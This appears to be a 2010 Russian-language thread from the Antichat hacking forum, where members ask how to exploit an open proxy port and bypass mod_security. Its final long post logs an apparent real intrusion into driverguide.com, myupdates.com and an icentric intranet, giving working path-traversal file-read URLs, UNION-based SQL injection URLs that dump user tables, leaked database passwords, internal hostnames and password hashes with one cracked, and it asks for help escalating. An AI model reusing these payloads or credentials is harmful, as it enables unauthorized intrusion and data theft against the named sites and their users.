Ваши вопросы по уязвимостям.

Запомнить меня

Привязать к IP

Нет аккаунта? Регистрация

07.05.2010, 13:51

.Slip

Leaders of Antichat - Level 4

Регистрация: 16.01.2006

Сообщений: 1,966

С нами: 10692266

Репутация: 3486

Цитата:

Сообщение от oko

Подскажите как можно использовать открытый прокси, ну т.е сканер выдал открыт порт 8080

Это может позволить злоумышленнику обойти брандмауэр и подключить к чувствительным порты, такие как 23 (Telnet), 25 (Sendmail)

ну вот что то такое... хотелось бы не много подробнее про это

Апельсин, телевизор, коробка, деревья, автомобиль. Можно поподробнее про это?

𝕏 Twitter Reddit Telegram Копировать ссылку

07.05.2010, 14:11

oko

Познающий

Регистрация: 01.05.2010

Сообщений: 34

С нами: 8437355

Репутация: -5

Цитата:

Сообщение от .Slip

Апельсин, телевизор, коробка, деревья, автомобиль. Можно поподробнее про это?

что можно сделать если у сайта открыт порт 8080 ? сканер пишет критическая уязвимость, вот хочу понять почему и как ей пользоваться

07.05.2010, 14:45

budden

Участник форума

Регистрация: 26.07.2008

Сообщений: 267

С нами: 9364549

Репутация: 184

Ничего нельзя сделать.

07.05.2010, 21:07

~~scorpic393~~

Banned

Регистрация: 05.02.2010

Сообщений: 70

С нами: 8559689

Репутация: 5

попал в админку через скулю типа 1 or 1 =1 --

в админке нет возможности залить шелл, хотя была, но какието уроды, которые там уже побывали раз*бали всё. Но я нашол там локальный инклуд, но на серваке стоит mod_secury который фильтрует и в гете и посте данные типа /etc/passwd, Хотя /etc/hosts - прошол. помогите обойти плиз mod_securuty для локального инклуда плиз.

Параноикам )

08.05.2010, 01:04

shell_c0de

Reservists Of Antichat - Level 6

Регистрация: 07.07.2009

Сообщений: 324

С нами: 8866466

Репутация: 564

Отправить сообщение для shell_c0de с помощью AIM

Параноикам )

Код:

$config['Database']['dbtype'] = 'mysql';

$config['Database']['dbname'] = 'vb3';

$config['Database']['tableprefix'] = 'vb3_';

$config['Database']['technicalemail'] = '';

$config['Database']['force_sql_mode'] = false;


$config['MasterServer']['servername'] = '192.168.1.194';
$config['MasterServer']['port'] = 3306;

$config['MasterServer']['username'] = 'betav2';
$config['MasterServer']['password'] = 'betav2a';

$config['MasterServer']['usepconnect'] = 0;


$config['SlaveServer']['servername'] = '';
$config['SlaveServer']['port'] = 3306;
$config['SlaveServer']['username'] = '';
$config['SlaveServer']['password'] = '';
$config['SlaveServer']['usepconnect'] = 0;

Версия Linux version 2.4.21-60.ELsmp (mockbuild@hs20-bc2-4.build.redhat.com) (gcc version 3.2.3 20030502 (Red Hat Linux 3.2.3-59)) #1
Локалка/соседы
192.168.1.244 web6.driverguide.com web6
192.168.1.211 web1.driverguide.com web1
192.168.1.212 web2.driverguide.com web2
192.168.1.214 web3.driverguide.com web3
192.168.1.215 web4.driverguide.com web4
192.168.1.243 web5.driverguide.com web5
127.0.0.1 members-images.driverguide.net
192.168.1.219 eml.driverguide.com
192.168.1.244 members.driverguide.com members
192.168.1.244 forums.driverguide.com forums
192.168.1.244 beta.driverguide.com beta
192.168.1.244 list.driverguide.com list
192.168.1.220 db1.driverguide.com db1
192.168.1.219 email.driverguide.net email
192.168.1.211 web1-internal.driverguide.net
192.168.1.212 web2-internal.driverguide.net

http://members.driverguide.com//internal/phpMyAdmin/
пыхадмин =) phpMyAdmin 2.5.3 сплойт для этой ветке http://milw0rm.com/exploits/309 но хз пока не юзал
http://myupdates.com/internal/admin/
http://myupdates.com/static.php?type=css&files=../internal/admin/.htaccess%00
editor:7vr1es1uwzlqI DES
в Форуме 91к юзверов дамп ваше =)
-added-
http://myupdates.com/static.php?type=css&files=../../../../../../../../../../home/httpd/myupdates.com/www/bcx/myupdates/home/_htpasswd/.htpasswd%00
editor:7vr1es1uwzlqI
http://members.driverguide.com//internal/phpMyAdmin/
Конфиг ПМА http://myupdates.com/static.php?type=css&files=../../../../../../../../../..//home/httpd/driverguide.com/members/icx/thirdparty/phpMyAdmin-2.5.3/config.inc.php%00

Alias /internal/phpMyAdmin/ "/home/httpd/driverguide.com/members/icx/thirdparty/phpMyAdmin-2.5.3/
путь с веба /internal/phpMyAdmin/ но млин
$config['MasterServer']['username'] = 'betav2';
$config['MasterServer']['password'] = 'betav2a';

http://myupdates.com/internal/admin/
вот еще http://myupdates.com/static.php?type=csshttp://myupdates.com/static.php?type=css&files=../../../../../../../../../..///home/httpd/driverguide.com/members/icx/thirdparty/FlashChat_v37/config.php%00

Код:

$database = "driverdb__live";	// MySQL database name
$dbuser = "dev";	// MySQL username
$dbpass = "dbd3v";	// MySQL password
$host = "192.168.1.194";	 // MySQL host name
moderatorPassword = "mod123";	// to login as a moderator
$spyPassword = "spy123";	 // to login as a spy (disabled when using XOOPS)

еще кое что откопал
http://myupdates.com/static.php?type...c/.htpasswd%00
http://intranet.icentric.com/
intranet:f68alIucmxrmU
quincy:B7B2pTzqkrdbQ
опять DES
http://blog.driverguide.com/wp-login.php стоит ВП

Попробовал через сессию но тут как бэ не совсем инклуд а читалка файлов получается, принклудит в лог апача нету резона=\
что можете рекомендовать ? что то в 5 утра башка не варит дальше, хотя 98% данные в руках но ничего не выходит =\
===
короче вот и скуля http://members.driverguide.com/index.php?companyid=-2712+union+select+user(),user_pass+from+driverguid e_blog.wp_users+/*&action=getinfo

Код:

<title>dev@192.168.1.222 ($P$B1SdEpP2uJl/0yIR3M6TryHvTigpEC/) Drivers / Support / Contact Info</title>

http://members.driverguide.com/index.php?companyid=-2712+union+select+username,password+from+user+limi t+1,100000/*&action=getinfo
<title>admin (a1e5555abefe434946e95f0de3fb2787) Drivers / Support / Contact Info</title>

a1e5555abefe434946e95f0de3fb2787 : Shaaolin
quincy:B7B2pTzqkrdbQ:p51s
http://intranet.icentric.com/
http://myupdates.com/internal/admin/
http://members.driverguide.com/internal/phpMyAdmin/
короче никуда не подошел или фильтр по айпи или хз =\
есть идеи ?
P.S Сорри за много букаф )